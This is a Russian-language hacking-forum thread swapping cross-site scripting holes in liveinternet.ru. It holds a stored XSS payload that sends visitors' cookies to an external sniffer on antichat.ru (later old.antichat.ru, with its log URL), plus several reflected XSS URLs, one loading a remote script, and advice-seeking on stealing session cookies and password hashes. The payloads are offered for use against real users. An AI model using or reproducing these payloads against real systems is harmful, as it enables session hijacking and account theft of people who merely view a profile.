Вот нашол активную xss: когда регимся, вводим в поле "О новом дневнике - в двух словах" Code: <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> . потом все кто помотрит ваш профиль отдаст куки... Примеры: http://www.liveinternet.ru/users/hello2all/profile/ - тут отдадите куки http://www.liveinternet.ru/users/nokia1/profile/ - алерт.
Туплю, не нашел этот пункт Именно где он? Я по новой не регился, я именно хотел бы узнать где он в настройках, + у других в пофиле такого тоже не увидел, Черт не дружу я с таких типов сайтами
Пишите Xss вирус =) Мой для ливжурнала помог пользователям получить красивые доменчики третего уровня для своих ЖЖ =)
http://market.liveinternet.ru/index.php?id=10091&page=1&vendor=0&sort=2&sortorder=1&pricelo=10%22%3E%3Cscript%3Ealert()%3C/script%3E0 Пассивная ХSS почти там же!
PASSIVE XSS при реге счетчиков http://www.liveinternet.ru/add/add/?rules=agreed&www=&type=site&random=1113854391&url=http%3A%2F%2Flalala.2u2r%2F&aliases=&name="><script src=http://ТВОЙСАЙТ.ru/js.js></script>&email=123%40123.123&password=mikmik&check=mikmik&keywords=&private=&subscribe=on&group=ru&group=ru%2Fauto&ok=+%E4%E0%EB%FC%F8%E5+%3E%3E+
Не совсем понял за что "-", но больше вопросов подобного плана задавать не буду. Единственно хотелось бы узнать, что я нарушил. во-первых посмотри название темы, то что ты написал не относится сюда.Есть вопрос, ищи, если такая тема есть, прочти, если нету, создай в соответствующем разделе и спроси.Разе непонятно почему "-"?Тоже самое относится и другому товарищу.Еще вопросы?С вами был m0nzt3r
если не ошибаюсь пасивный xxs это тот каторый уже прикрыли, так зачем выкладывать его если не прав объясните что значит пасивный. пассивная, это когда жертва должна зайти по ссылке, которую ты дашь, чтоб хсс подействовала.Понятно?Мало флейми, устал посты стирать твои.. (m0nzt3r)
ребят, а дырку, по ходу, уже прикрыли. мне почему-то кажется, что тут нетрудно будет другую найти, тут просто <script> фильтруется. *вышесказанное было написано без моска, ибо я в этом деле не очень разбираюсь =)*. может кто-нибудь башковитый и рукастый сможет сообразить в чем тут дело? помогите, пожалуйста.
2 re-arranged http://www.liveinternet.ru/member2.php?action=addlist&userlist=buddy&userid=729772&userownid=undefined"><script>alert("xss")</script> пассивная
А что дальше делать? Куки отправляются на снифф общий? если да, то я не могу найти его лог =/ Зы: или это уже вообще не катит? +1 =)
Не прикрыли ничего, http://www.liveinternet.ru/users/nokia1/profile/ алерт есть.. 2DeadFire лог теперь на old.antichat.ru Code: <script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> Log: http://old.antichat.ru/sniff/log.php
Объясните плз для тупых что нужно сделать по шагам. Зы: там скрипты отсеиваются Зыы: я создал юзера (Vasssssia) в поле краткая инфа запихал скрипт, ну собсно и в основную тоже, на сниф вообще ниче не приходит.. приходит, когда просто в дневник пихаешь "картинку", только толку от этого как от быка молока... Зыыы: за лог спасибо
я не любитель создавать темы изза небольших вопросов, поэтому спрошу тут. В куках лиру хранится чистый мд5 или соль?
